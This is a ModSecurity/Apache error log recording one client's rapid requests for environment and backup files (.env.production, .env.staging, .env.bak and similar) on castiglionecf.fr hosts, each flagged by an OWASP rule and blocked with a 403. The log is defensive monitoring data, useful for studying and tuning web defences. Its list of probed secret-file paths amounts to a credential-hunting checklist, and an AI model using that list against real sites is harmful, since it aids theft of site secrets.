[Mon May 11 16:25:08.063506 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:54306] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.production"] [unique_id "agHmxFV4kyjgo4bQBUhTvwAAAMk"]
[Mon May 11 16:25:08.315999 2026] [security2:error] [pid 1412074:tid 1412098] [client 18.180.54.2:54316] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.development"] [unique_id "agHmxDJnyuKVXoStDha0GgAAAFY"]
[Mon May 11 16:25:08.316254 2026] [security2:error] [pid 1412074:tid 1412098] [client 18.180.54.2:54316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.development"] [unique_id "agHmxDJnyuKVXoStDha0GgAAAFY"]
[Mon May 11 16:25:08.316732 2026] [core:error] [pid 1412074:tid 1412098] [client 18.180.54.2:54316] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:08.317311 2026] [security2:error] [pid 1412074:tid 1412098] [client 18.180.54.2:54316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.development"] [unique_id "agHmxDJnyuKVXoStDha0GgAAAFY"]
[Mon May 11 16:25:08.803263 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:48050] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.staging"] [unique_id "agHmxEWKUxpmnkK7zHx7bgAAAQM"]
[Mon May 11 16:25:08.803502 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:48050] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.staging"] [unique_id "agHmxEWKUxpmnkK7zHx7bgAAAQM"]
[Mon May 11 16:25:08.803983 2026] [core:error] [pid 1411055:tid 1411060] [client 18.180.54.2:48050] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:08.804454 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:48050] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.staging"] [unique_id "agHmxEWKUxpmnkK7zHx7bgAAAQM"]
[Mon May 11 16:25:09.014782 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:48060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.test"] [unique_id "agHmxQ-Qm4vhlWBPlMi5ewAAAAk"]
[Mon May 11 16:25:09.015015 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:48060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.test"] [unique_id "agHmxQ-Qm4vhlWBPlMi5ewAAAAk"]
[Mon May 11 16:25:09.015505 2026] [core:error] [pid 1411099:tid 1411109] [client 18.180.54.2:48060] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:09.015686 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:48060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.test"] [unique_id "agHmxQ-Qm4vhlWBPlMi5ewAAAAk"]
[Mon May 11 16:25:09.219604 2026] [security2:error] [pid 1411201:tid 1411250] [client 43.157.82.252:43036] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agHmxfy_GXSWIKeli0vxywAAAIQ"], referer: https://jeanboyault.fr/
[Mon May 11 16:25:09.500024 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:48076] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.development"] [unique_id "agHmxVV4kyjgo4bQBUhTwAAAANg"]
[Mon May 11 16:25:09.500346 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:48076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.development"] [unique_id "agHmxVV4kyjgo4bQBUhTwAAAANg"]
[Mon May 11 16:25:09.501052 2026] [core:error] [pid 1416109:tid 1416154] [client 18.180.54.2:48076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:09.501243 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:48076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.development"] [unique_id "agHmxVV4kyjgo4bQBUhTwAAAANg"]
[Mon May 11 16:25:09.734138 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:48090] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.remote"] [unique_id "agHmxQ-Qm4vhlWBPlMi5fAAAABg"]
[Mon May 11 16:25:09.734375 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:48090] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.remote"] [unique_id "agHmxQ-Qm4vhlWBPlMi5fAAAABg"]
[Mon May 11 16:25:09.734844 2026] [core:error] [pid 1411099:tid 1411124] [client 18.180.54.2:48090] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:09.734995 2026] [security2:error] [pid 1411099:tid 1411124] [client 18.180.54.2:48090] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.remote"] [unique_id "agHmxQ-Qm4vhlWBPlMi5fAAAABg"]
[Mon May 11 16:25:10.179401 2026] [security2:error] [pid 1416109:tid 1416143] [client 18.180.54.2:48100] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.test"] [unique_id "agHmxlV4kyjgo4bQBUhTwgAAAM0"]
[Mon May 11 16:25:10.179663 2026] [security2:error] [pid 1416109:tid 1416143] [client 18.180.54.2:48100] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.test"] [unique_id "agHmxlV4kyjgo4bQBUhTwgAAAM0"]
[Mon May 11 16:25:10.180223 2026] [core:error] [pid 1416109:tid 1416143] [client 18.180.54.2:48100] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:10.180716 2026] [security2:error] [pid 1416109:tid 1416143] [client 18.180.54.2:48100] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.test"] [unique_id "agHmxlV4kyjgo4bQBUhTwgAAAM0"]
[Mon May 11 16:25:10.433713 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:48102] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.bak"] [unique_id "agHmxjJnyuKVXoStDha0HAAAAFg"]
[Mon May 11 16:25:10.433944 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:48102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.bak"] [unique_id "agHmxjJnyuKVXoStDha0HAAAAFg"]
[Mon May 11 16:25:10.434438 2026] [core:error] [pid 1412074:tid 1412100] [client 18.180.54.2:48102] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:10.435005 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:48102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.bak"] [unique_id "agHmxjJnyuKVXoStDha0HAAAAFg"]
[Mon May 11 16:25:10.863745 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:48104] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.remote"] [unique_id "agHmxg-Qm4vhlWBPlMi5fQAAABA"]
[Mon May 11 16:25:10.863958 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:48104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.remote"] [unique_id "agHmxg-Qm4vhlWBPlMi5fQAAABA"]
[Mon May 11 16:25:10.864525 2026] [core:error] [pid 1411099:tid 1411116] [client 18.180.54.2:48104] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:10.864701 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:48104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.remote"] [unique_id "agHmxg-Qm4vhlWBPlMi5fQAAABA"]
[Mon May 11 16:25:11.114674 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:48116] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.backup"] [unique_id "agHmx1V4kyjgo4bQBUhTwwAAAMg"]
[Mon May 11 16:25:11.114866 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:48116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.backup"] [unique_id "agHmx1V4kyjgo4bQBUhTwwAAAMg"]
[Mon May 11 16:25:11.115353 2026] [core:error] [pid 1416109:tid 1416138] [client 18.180.54.2:48116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:11.115794 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:48116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.backup"] [unique_id "agHmx1V4kyjgo4bQBUhTwwAAAMg"]
[Mon May 11 16:25:11.579447 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:48124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.bak"] [unique_id "agHmx0WKUxpmnkK7zHx7cgAAAQE"]
[Mon May 11 16:25:11.579674 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:48124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.bak"] [unique_id "agHmx0WKUxpmnkK7zHx7cgAAAQE"]
[Mon May 11 16:25:11.580149 2026] [core:error] [pid 1411055:tid 1411058] [client 18.180.54.2:48124] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:11.581317 2026] [security2:error] [pid 1411055:tid 1411058] [client 18.180.54.2:48124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.bak"] [unique_id "agHmx0WKUxpmnkK7zHx7cgAAAQE"]
[Mon May 11 16:25:11.792438 2026] [security2:error] [pid 1411201:tid 1411260] [client 18.180.54.2:48130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.save"] [unique_id "agHmx_y_GXSWIKeli0vx0AAAAI4"]
[Mon May 11 16:25:11.792670 2026] [security2:error] [pid 1411201:tid 1411260] [client 18.180.54.2:48130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.save"] [unique_id "agHmx_y_GXSWIKeli0vx0AAAAI4"]
[Mon May 11 16:25:11.793177 2026] [core:error] [pid 1411201:tid 1411260] [client 18.180.54.2:48130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:11.794264 2026] [security2:error] [pid 1411201:tid 1411260] [client 18.180.54.2:48130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.save"] [unique_id "agHmx_y_GXSWIKeli0vx0AAAAI4"]
